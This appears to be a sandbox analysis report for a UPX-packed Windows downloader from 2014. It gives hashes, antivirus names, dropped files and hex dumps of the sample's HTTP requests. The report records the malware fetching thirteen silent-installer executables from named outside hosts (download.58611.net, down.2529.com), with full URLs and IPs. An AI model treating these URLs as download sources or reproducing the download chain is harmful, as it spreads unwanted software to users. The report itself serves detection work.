Analysis Date: 2014-11-06 23:59:36
MD5: b26421e558bcd33e22fa2b149951af39
SHA1: 6fe71521a2e9365abaa9273d18c30d868e39629c

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section UPX0 md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0 (these are the hashes of zero bytes: the section has no raw data on disk, which is expected for the UPX0 section that the UPX stub fills only at run time)
Section UPX1 md5: 0844205a3142c650215828fd56c965b0 sha1: 0390375d6d289eedcc2dc53fe53d05fb80c19a2e size: 20480
Section .rsrc md5: 71ab25bedf3c472ee7df5f3f204a3fda sha1: d176a9d4cb24c983766e7ab7cbe6a2e4f86a8eb4 size: 6144
Timestamp: 2009-02-07 06:33:08 (PE header compile timestamp; this field is attacker-controlled and should not be taken as evidence of when the sample was actually built)
Packer: UPX -> www.upx.sourceforge.net
PEhash: bf6bf3b86da7c45d2116100c727372a932541f85
IMPhash: 26d3c4cf36a46cd980f89d55afb73146 (because the file is UPX-packed, the import hash is computed over the packer's reduced import table, so it is likely to match other UPX-packed binaries regardless of payload; treat it as a weak clustering key)
AV 360 Safe: Trojan.Generic.12035610
AV Ad-Aware: Trojan.Generic.12035610
AV Alwil (avast): ADODB-BM [Expl]
AV Arcabit (arcavir): no_virus
AV Authentium: W32/Downloader.KKXJ-8661
AV Avira (antivir): TR/Dldr.Agent.ahk.3
AV BullGuard: Trojan.Generic.12035610
AV CA (E-Trust Ino): no_virus
AV CAT (quickheal): no_virus
AV ClamAV: no_virus
AV Dr. Web: no_virus
AV Emsisoft: Trojan.Generic.12035610
AV Eset (nod32): no_virus
AV Fortinet: VBS/Agent.AHK!tr.dldr
AV Frisk (f-prot): no_virus
AV F-Secure: Trojan.Generic.12035610
AV Grisoft (avg): VBS/Psyme.dropper
AV Ikarus: Win32.SuspectCrc
AV K7: Riskware ( 0040eff71 )
AV Kaspersky: Trojan-Downloader.VBS.Agent.ahk
AV MalwareBytes: no_virus
AV Mcafee: RDN/Generic Downloader.x!lg
AV Microsoft Security Essentials: no_virus
AV MicroWorld (escan): no_virus
AV Norman: Trojan.Generic.12035610
AV Rising: no_virus
AV Sophos: no_virus
AV Symantec: no_virus
AV Trend Micro: no_virus
AV VirusBlokAda (vba32): no_virus
Detection at scan time was split (15 of the 30 engines listed flag the sample). The engines that give a specific name (Kaspersky Trojan-Downloader.VBS.Agent.ahk, Fortinet VBS/Agent.AHK!tr.dldr, Avira TR/Dldr.Agent.ahk.3, AVG VBS/Psyme.dropper) agree with the runtime behaviour recorded below: a packed executable that drops and runs a VBScript downloader. The Avast name suggests an ADODB.Stream write-to-disk routine, which would fit the script writing .exe files to C:\, but the script itself is not shown in this report, so that is inferred from the detection name only.

Runtime Details:


Process
↳ C:\malware.exe

Creates File: 123.VBS
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\1.tmp\setup.bat
Creates File: setup.bat
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\1.tmp
Note: the dropper stages a batch file and a VBScript and then deletes the staging directory under Temp, so the scripts will not be present on the disk image after execution; recover them from the sandbox's dropped-file capture or from memory if the script content is needed.

Process
↳ C:\WINDOWS\system32\cmd.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: PIPE\wkssvc
Creates Process: 123.VBS
Creates Process: "C:\WINDOWS\System32\WScript.exe" "C:\WINDOWS\system32\123.VBS"
Creates Process: ping -n 3 127.0.0.1
Note: cmd.exe is presumably executing the dropped setup.bat (it is the only batch artifact recorded). The script is launched from C:\WINDOWS\system32\123.VBS, so it was copied into a system directory; that write succeeds here because the sandbox runs as Administrator (see the profile paths above) and may fail or land elsewhere under a standard user. `ping -n 3 127.0.0.1` is the common batch-file idiom for a short delay of roughly two seconds, not network activity of interest.

Process
↳ ping -n 3 127.0.0.1

Winsock DNS: 127.0.0.1

Process
↳ 123.VBS

Process
↳ "C:\WINDOWS\System32\WScript.exe" "C:\WINDOWS\system32\123.VBS"

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: C:\qqpcmgr_silent_52000.exe
Creates File: C:\ADMon.29055-7601.exe
Creates File: C:\haozip_silent_52000.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\pps_silent_52000.exe
Creates File: C:\QQBrowser_silent_52000.exe
Creates File: C:\pic_silent_52000.exe
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\sogouie_silent_52000.exe
Creates File: C:\UCBrowser_silent_52000.exe
Creates File: C:\gm_5_34648_01.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: \Device\Afd\AsyncConnectHlp
Creates File: C:\PPTV_forqd3036_07601.exe
Creates File: C:\kuwo_silent_52000.exe
Creates File: C:\baiduan_silent_52000.exe
Creates File: C:\baidusd_silent_52000.exe
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: download.58611.net
Winsock DNS: down.2529.com
Note: the WinINet artifacts (History.IE5 / Cookies / Content.IE5 index.dat files, WininetConnectionMutex, the ProxyEnable and ProxyBypass reads) indicate the script fetches over WinINet rather than raw sockets, so the HTTP requests inherit the host's proxy settings and the IE user-agent. Thirteen executables are written to the root of C:\ (again only possible because of the Administrator context), but only twelve GET requests appear in the network section: C:\qqpcmgr_silent_52000.exe has no matching request, so either that fetch was not captured or the file was created without a download. No server responses are recorded and no process is created from any of the downloaded files, so this report does not establish that any payload was actually retrieved or executed. The filename pattern (*_silent_*, *_forqd*) suggests silent installers of third-party software, consistent with a pay-per-install downloader, but that is an inference from the names only.

Network Details:

DNS: down.2529.com
Type: A
61.164.183.253
DNS: download.58611.net
Type: A
218.241.29.215
HTTP GET: http://down.2529.com/gm_5_34648_01.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://download.58611.net:8181/baiduan/baiduan_silent_52000.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://download.58611.net:8181/baidusd/baidusd_silent_52000.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://download.58611.net:8181/QQBrowser/QQBrowser_silent_52000.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://download.58611.net:8181/uc/UCBrowser_silent_52000.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://download.58611.net:8181/haozip_silent/haozip_silent_52000.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://download.58611.net:8181/sogouie/sogouie_silent_52000.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://download.58611.net:8181/pic/pic_silent_52000.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://download.58611.net:8181/kuwo_silent/kuwo_silent_52000.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://download.58611.net:8181/admon/ADMon.29055-7601.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://download.58611.net:8181/pptv_silent/PPTV_forqd3036_07601.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://download.58611.net:8181/pps/pps_silent_52000.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP: 192.168.1.1:1032 ➝ 61.164.183.253:80
Flows TCP: 192.168.1.1:1033 ➝ 218.241.29.215:8181
Flows TCP: 192.168.1.1:1034 ➝ 218.241.29.215:8181
Flows TCP: 192.168.1.1:1035 ➝ 218.241.29.215:8181
Flows TCP: 192.168.1.1:1036 ➝ 218.241.29.215:8181
Flows TCP: 192.168.1.1:1037 ➝ 218.241.29.215:8181
Flows TCP: 192.168.1.1:1038 ➝ 218.241.29.215:8181
Flows TCP: 192.168.1.1:1039 ➝ 218.241.29.215:8181
Flows TCP: 192.168.1.1:1040 ➝ 218.241.29.215:8181
Flows TCP: 192.168.1.1:1041 ➝ 218.241.29.215:8181
Flows TCP: 192.168.1.1:1042 ➝ 218.241.29.215:8181
Flows TCP: 192.168.1.1:1043 ➝ 218.241.29.215:8181
Note: network indicators from this run are download.58611.net (218.241.29.215, TCP/8181) and down.2529.com (61.164.183.253, TCP/80); IPs resolved in 2014 and should be re-validated before use. The twelve flows map one-to-one onto the twelve GET requests, with the client source port incrementing each time, so every download appears to have used a fresh TCP connection despite the Connection: Keep-Alive header. The User-Agent is the default IE6 / Windows XP string that matches the sandbox OS (the profile paths above are XP-style), so it is most likely supplied by WinINet rather than hard-coded by the script; on other hosts it will differ, and it should not be used as a standalone signature.

Raw Pcap (client requests only; no server responses are included, so response codes, sizes and the content actually served cannot be confirmed from this report). Several of the dumps below carry a few bytes after the request's terminating CRLF CRLF (for example "ive.", "live....e", "ep-Alive.") — these look like stale bytes from a reused buffer in the capture rendering rather than data sent on the wire, and they should be ignored when deriving signatures; each request ends at the first CRLF CRLF.
0x00000000 (00000)   47455420 2f676d5f 355f3334 3634385f   GET /gm_5_34648_
0x00000010 (00016)   30312e65 78652048 5454502f 312e310d   01.exe HTTP/1.1.
0x00000020 (00032)   0a416363 6570743a 202a2f2a 0d0a4163   .Accept: */*..Ac
0x00000030 (00048)   63657074 2d456e63 6f64696e 673a2067   cept-Encoding: g
0x00000040 (00064)   7a69702c 20646566 6c617465 0d0a5573   zip, deflate..Us
0x00000050 (00080)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x00000060 (00096)   612f342e 30202863 6f6d7061 7469626c   a/4.0 (compatibl
0x00000070 (00112)   653b204d 53494520 362e303b 2057696e   e; MSIE 6.0; Win
0x00000080 (00128)   646f7773 204e5420 352e313b 20535631   dows NT 5.1; SV1
0x00000090 (00144)   3b202e4e 45542043 4c522032 2e302e35   ; .NET CLR 2.0.5
0x000000a0 (00160)   30373237 290d0a48 6f73743a 20646f77   0727)..Host: dow
0x000000b0 (00176)   6e2e3235 32392e63 6f6d0d0a 436f6e6e   n.2529.com..Conn
0x000000c0 (00192)   65637469 6f6e3a20 4b656570 2d416c69   ection: Keep-Ali
0x000000d0 (00208)   76650d0a 0d0a                         ve....

0x00000000 (00000)   47455420 2f626169 6475616e 2f626169   GET /baiduan/bai
0x00000010 (00016)   6475616e 5f73696c 656e745f 35323030   duan_silent_5200
0x00000020 (00032)   302e6578 65204854 54502f31 2e310d0a   0.exe HTTP/1.1..
0x00000030 (00048)   41636365 70743a20 2a2f2a0d 0a416363   Accept: */*..Acc
0x00000040 (00064)   6570742d 456e636f 64696e67 3a20677a   ept-Encoding: gz
0x00000050 (00080)   69702c20 6465666c 6174650d 0a557365   ip, deflate..Use
0x00000060 (00096)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000070 (00112)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000080 (00128)   3b204d53 49452036 2e303b20 57696e64   ; MSIE 6.0; Wind
0x00000090 (00144)   6f777320 4e542035 2e313b20 5356313b   ows NT 5.1; SV1;
0x000000a0 (00160)   202e4e45 5420434c 5220322e 302e3530    .NET CLR 2.0.50
0x000000b0 (00176)   37323729 0d0a486f 73743a20 646f776e   727)..Host: down
0x000000c0 (00192)   6c6f6164 2e353836 31312e6e 65743a38   load.58611.net:8
0x000000d0 (00208)   3138310d 0a436f6e 6e656374 696f6e3a   181..Connection:
0x000000e0 (00224)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....

0x00000000 (00000)   47455420 2f626169 64757364 2f626169   GET /baidusd/bai
0x00000010 (00016)   64757364 5f73696c 656e745f 35323030   dusd_silent_5200
0x00000020 (00032)   302e6578 65204854 54502f31 2e310d0a   0.exe HTTP/1.1..
0x00000030 (00048)   41636365 70743a20 2a2f2a0d 0a416363   Accept: */*..Acc
0x00000040 (00064)   6570742d 456e636f 64696e67 3a20677a   ept-Encoding: gz
0x00000050 (00080)   69702c20 6465666c 6174650d 0a557365   ip, deflate..Use
0x00000060 (00096)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000070 (00112)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000080 (00128)   3b204d53 49452036 2e303b20 57696e64   ; MSIE 6.0; Wind
0x00000090 (00144)   6f777320 4e542035 2e313b20 5356313b   ows NT 5.1; SV1;
0x000000a0 (00160)   202e4e45 5420434c 5220322e 302e3530    .NET CLR 2.0.50
0x000000b0 (00176)   37323729 0d0a486f 73743a20 646f776e   727)..Host: down
0x000000c0 (00192)   6c6f6164 2e353836 31312e6e 65743a38   load.58611.net:8
0x000000d0 (00208)   3138310d 0a436f6e 6e656374 696f6e3a   181..Connection:
0x000000e0 (00224)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....

0x00000000 (00000)   47455420 2f515142 726f7773 65722f51   GET /QQBrowser/Q
0x00000010 (00016)   5142726f 77736572 5f73696c 656e745f   QBrowser_silent_
0x00000020 (00032)   35323030 302e6578 65204854 54502f31   52000.exe HTTP/1
0x00000030 (00048)   2e310d0a 41636365 70743a20 2a2f2a0d   .1..Accept: */*.
0x00000040 (00064)   0a416363 6570742d 456e636f 64696e67   .Accept-Encoding
0x00000050 (00080)   3a20677a 69702c20 6465666c 6174650d   : gzip, deflate.
0x00000060 (00096)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000070 (00112)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000080 (00128)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000090 (00144)   57696e64 6f777320 4e542035 2e313b20   Windows NT 5.1; 
0x000000a0 (00160)   5356313b 202e4e45 5420434c 5220322e   SV1; .NET CLR 2.
0x000000b0 (00176)   302e3530 37323729 0d0a486f 73743a20   0.50727)..Host: 
0x000000c0 (00192)   646f776e 6c6f6164 2e353836 31312e6e   download.58611.n
0x000000d0 (00208)   65743a38 3138310d 0a436f6e 6e656374   et:8181..Connect
0x000000e0 (00224)   696f6e3a 204b6565 702d416c 6976650d   ion: Keep-Alive.
0x000000f0 (00240)   0a0d0a                                ...

0x00000000 (00000)   47455420 2f75632f 55434272 6f777365   GET /uc/UCBrowse
0x00000010 (00016)   725f7369 6c656e74 5f353230 30302e65   r_silent_52000.e
0x00000020 (00032)   78652048 5454502f 312e310d 0a416363   xe HTTP/1.1..Acc
0x00000030 (00048)   6570743a 202a2f2a 0d0a4163 63657074   ept: */*..Accept
0x00000040 (00064)   2d456e63 6f64696e 673a2067 7a69702c   -Encoding: gzip,
0x00000050 (00080)   20646566 6c617465 0d0a5573 65722d41    deflate..User-A
0x00000060 (00096)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000070 (00112)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000080 (00128)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000090 (00144)   204e5420 352e313b 20535631 3b202e4e    NT 5.1; SV1; .N
0x000000a0 (00160)   45542043 4c522032 2e302e35 30373237   ET CLR 2.0.50727
0x000000b0 (00176)   290d0a48 6f73743a 20646f77 6e6c6f61   )..Host: downloa
0x000000c0 (00192)   642e3538 3631312e 6e65743a 38313831   d.58611.net:8181
0x000000d0 (00208)   0d0a436f 6e6e6563 74696f6e 3a204b65   ..Connection: Ke
0x000000e0 (00224)   65702d41 6c697665 0d0a0d0a 6976650d   ep-Alive....ive.
0x000000f0 (00240)   0a0d0a                                ...

0x00000000 (00000)   47455420 2f68616f 7a69705f 73696c65   GET /haozip_sile
0x00000010 (00016)   6e742f68 616f7a69 705f7369 6c656e74   nt/haozip_silent
0x00000020 (00032)   5f353230 30302e65 78652048 5454502f   _52000.exe HTTP/
0x00000030 (00048)   312e310d 0a416363 6570743a 202a2f2a   1.1..Accept: */*
0x00000040 (00064)   0d0a4163 63657074 2d456e63 6f64696e   ..Accept-Encodin
0x00000050 (00080)   673a2067 7a69702c 20646566 6c617465   g: gzip, deflate
0x00000060 (00096)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x00000070 (00112)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x00000080 (00128)   7469626c 653b204d 53494520 362e303b   tible; MSIE 6.0;
0x00000090 (00144)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x000000a0 (00160)   20535631 3b202e4e 45542043 4c522032    SV1; .NET CLR 2
0x000000b0 (00176)   2e302e35 30373237 290d0a48 6f73743a   .0.50727)..Host:
0x000000c0 (00192)   20646f77 6e6c6f61 642e3538 3631312e    download.58611.
0x000000d0 (00208)   6e65743a 38313831 0d0a436f 6e6e6563   net:8181..Connec
0x000000e0 (00224)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000f0 (00240)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f736f67 6f756965 2f736f67   GET /sogouie/sog
0x00000010 (00016)   6f756965 5f73696c 656e745f 35323030   ouie_silent_5200
0x00000020 (00032)   302e6578 65204854 54502f31 2e310d0a   0.exe HTTP/1.1..
0x00000030 (00048)   41636365 70743a20 2a2f2a0d 0a416363   Accept: */*..Acc
0x00000040 (00064)   6570742d 456e636f 64696e67 3a20677a   ept-Encoding: gz
0x00000050 (00080)   69702c20 6465666c 6174650d 0a557365   ip, deflate..Use
0x00000060 (00096)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000070 (00112)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000080 (00128)   3b204d53 49452036 2e303b20 57696e64   ; MSIE 6.0; Wind
0x00000090 (00144)   6f777320 4e542035 2e313b20 5356313b   ows NT 5.1; SV1;
0x000000a0 (00160)   202e4e45 5420434c 5220322e 302e3530    .NET CLR 2.0.50
0x000000b0 (00176)   37323729 0d0a486f 73743a20 646f776e   727)..Host: down
0x000000c0 (00192)   6c6f6164 2e353836 31312e6e 65743a38   load.58611.net:8
0x000000d0 (00208)   3138310d 0a436f6e 6e656374 696f6e3a   181..Connection:
0x000000e0 (00224)   204b6565 702d416c 6976650d 0a0d0a65    Keep-Alive....e
0x000000f0 (00240)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f706963 2f706963 5f73696c   GET /pic/pic_sil
0x00000010 (00016)   656e745f 35323030 302e6578 65204854   ent_52000.exe HT
0x00000020 (00032)   54502f31 2e310d0a 41636365 70743a20   TP/1.1..Accept: 
0x00000030 (00048)   2a2f2a0d 0a416363 6570742d 456e636f   */*..Accept-Enco
0x00000040 (00064)   64696e67 3a20677a 69702c20 6465666c   ding: gzip, defl
0x00000050 (00080)   6174650d 0a557365 722d4167 656e743a   ate..User-Agent:
0x00000060 (00096)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000070 (00112)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000080 (00128)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000090 (00144)   2e313b20 5356313b 202e4e45 5420434c   .1; SV1; .NET CL
0x000000a0 (00160)   5220322e 302e3530 37323729 0d0a486f   R 2.0.50727)..Ho
0x000000b0 (00176)   73743a20 646f776e 6c6f6164 2e353836   st: download.586
0x000000c0 (00192)   31312e6e 65743a38 3138310d 0a436f6e   11.net:8181..Con
0x000000d0 (00208)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x000000e0 (00224)   6976650d 0a0d0a6c 6976650d 0a0d0a65   ive....live....e
0x000000f0 (00240)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f6b7577 6f5f7369 6c656e74   GET /kuwo_silent
0x00000010 (00016)   2f6b7577 6f5f7369 6c656e74 5f353230   /kuwo_silent_520
0x00000020 (00032)   30302e65 78652048 5454502f 312e310d   00.exe HTTP/1.1.
0x00000030 (00048)   0a416363 6570743a 202a2f2a 0d0a4163   .Accept: */*..Ac
0x00000040 (00064)   63657074 2d456e63 6f64696e 673a2067   cept-Encoding: g
0x00000050 (00080)   7a69702c 20646566 6c617465 0d0a5573   zip, deflate..Us
0x00000060 (00096)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x00000070 (00112)   612f342e 30202863 6f6d7061 7469626c   a/4.0 (compatibl
0x00000080 (00128)   653b204d 53494520 362e303b 2057696e   e; MSIE 6.0; Win
0x00000090 (00144)   646f7773 204e5420 352e313b 20535631   dows NT 5.1; SV1
0x000000a0 (00160)   3b202e4e 45542043 4c522032 2e302e35   ; .NET CLR 2.0.5
0x000000b0 (00176)   30373237 290d0a48 6f73743a 20646f77   0727)..Host: dow
0x000000c0 (00192)   6e6c6f61 642e3538 3631312e 6e65743a   nload.58611.net:
0x000000d0 (00208)   38313831 0d0a436f 6e6e6563 74696f6e   8181..Connection
0x000000e0 (00224)   3a204b65 65702d41 6c697665 0d0a0d0a   : Keep-Alive....
0x000000f0 (00240)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f61646d 6f6e2f41 444d6f6e   GET /admon/ADMon
0x00000010 (00016)   2e323930 35352d37 3630312e 65786520   .29055-7601.exe 
0x00000020 (00032)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000030 (00048)   3a202a2f 2a0d0a41 63636570 742d456e   : */*..Accept-En
0x00000040 (00064)   636f6469 6e673a20 677a6970 2c206465   coding: gzip, de
0x00000050 (00080)   666c6174 650d0a55 7365722d 4167656e   flate..User-Agen
0x00000060 (00096)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000070 (00112)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000080 (00128)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000090 (00144)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x000000a0 (00160)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000b0 (00176)   486f7374 3a20646f 776e6c6f 61642e35   Host: download.5
0x000000c0 (00192)   38363131 2e6e6574 3a383138 310d0a43   8611.net:8181..C
0x000000d0 (00208)   6f6e6e65 6374696f 6e3a204b 6565702d   onnection: Keep-
0x000000e0 (00224)   416c6976 650d0a0d 0a697665 0d0a0d0a   Alive....ive....
0x000000f0 (00240)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f707074 765f7369 6c656e74   GET /pptv_silent
0x00000010 (00016)   2f505054 565f666f 72716433 3033365f   /PPTV_forqd3036_
0x00000020 (00032)   30373630 312e6578 65204854 54502f31   07601.exe HTTP/1
0x00000030 (00048)   2e310d0a 41636365 70743a20 2a2f2a0d   .1..Accept: */*.
0x00000040 (00064)   0a416363 6570742d 456e636f 64696e67   .Accept-Encoding
0x00000050 (00080)   3a20677a 69702c20 6465666c 6174650d   : gzip, deflate.
0x00000060 (00096)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000070 (00112)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000080 (00128)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000090 (00144)   57696e64 6f777320 4e542035 2e313b20   Windows NT 5.1; 
0x000000a0 (00160)   5356313b 202e4e45 5420434c 5220322e   SV1; .NET CLR 2.
0x000000b0 (00176)   302e3530 37323729 0d0a486f 73743a20   0.50727)..Host: 
0x000000c0 (00192)   646f776e 6c6f6164 2e353836 31312e6e   download.58611.n
0x000000d0 (00208)   65743a38 3138310d 0a436f6e 6e656374   et:8181..Connect
0x000000e0 (00224)   696f6e3a 204b6565 702d416c 6976650d   ion: Keep-Alive.
0x000000f0 (00240)   0a0d0a0a                              ....

0x00000000 (00000)   47455420 2f707073 2f707073 5f73696c   GET /pps/pps_sil
0x00000010 (00016)   656e745f 35323030 302e6578 65204854   ent_52000.exe HT
0x00000020 (00032)   54502f31 2e310d0a 41636365 70743a20   TP/1.1..Accept: 
0x00000030 (00048)   2a2f2a0d 0a416363 6570742d 456e636f   */*..Accept-Enco
0x00000040 (00064)   64696e67 3a20677a 69702c20 6465666c   ding: gzip, defl
0x00000050 (00080)   6174650d 0a557365 722d4167 656e743a   ate..User-Agent:
0x00000060 (00096)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000070 (00112)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000080 (00128)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000090 (00144)   2e313b20 5356313b 202e4e45 5420434c   .1; SV1; .NET CL
0x000000a0 (00160)   5220322e 302e3530 37323729 0d0a486f   R 2.0.50727)..Ho
0x000000b0 (00176)   73743a20 646f776e 6c6f6164 2e353836   st: download.586
0x000000c0 (00192)   31312e6e 65743a38 3138310d 0a436f6e   11.net:8181..Con
0x000000d0 (00208)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x000000e0 (00224)   6976650d 0a0d0a65 702d416c 6976650d   ive....ep-Alive.
0x000000f0 (00240)   0a0d0a0a                              ....


Strings (from the packed file; these are dominated by compressed-data noise, the UPX loader stub's imports — LoadLibraryA, GetProcAddress, VirtualAlloc, VirtualFree, VirtualProtect, ExitProcess — and what appears to be a default Common-Controls manifest template ("CompanyName.ProductName.YourApp"). Neither the dropped 123.VBS / setup.bat, nor the download hosts or URLs seen at run time, appear here, so unpack the sample (e.g. with `upx -d`, or dump it from memory after the stub has run) before relying on strings for static analysis or signature writing.)
&
.
..&
.
..
>:0'd/F
22cyHrR
24m|9x
8c{/H?
9l$\w_
9{*T/rg.
  <assemblyIdentity
      <assemblyIdentity
</assembly>P
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
~-#>b#N
$`	)~c
?c1:aG
=CLeSR
 c|_lf
CoInitialize
COMCTL32.dll
/cT4i1
dCl]o`
  </dependency>
  <dependency>
    </dependentAssembly>
    <dependentAssembly>
  <description></description>
.)D$H)
D$t+D$\
D$t#D$h
%ew#l}
ExitProcess
`:fAH{
GDI32.dll
GetProcAddress
$g&i0,
h*SphZ;	
InitCommonControls
IsChild
KERNEL32.DLL
(Kn(8B
kt#y7\
        language="*" />
LoadLibraryA
\LwLc\F
memset
MGf'>S
MSVCRT.dll
    name="CompanyName.ProductName.YourApp"
        name="Microsoft.Windows.Common-Controls"
|O]"6|33
OLE32.dll
        processorArchitecture="X86"
    processorArchitecture="X86"
        publicKeyToken="6595b64144ccf1df"
pUK&Vq^
PVUR o
,&->qY
SetBkColor
SHELL32.dll
ShellExecuteExA
s`)L$4
|smm #
sm<xP*
.S.OZ>4
**TEB0{T
!This program cannot be run in DOS mode.
t$t#t$l
        type="win32"
    type="win32" />
ug7$sw
USER32.dll
    version="1.0.0.0"
        version="6.0.0.0"
VEzQm6
VirtualAlloc
VirtualFree
VirtualProtect
(vlr,kf|
^ wkxS
$Wn4Q.
W.XS;W
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
XPTPSW
xy*%K!n
@*zU!2>M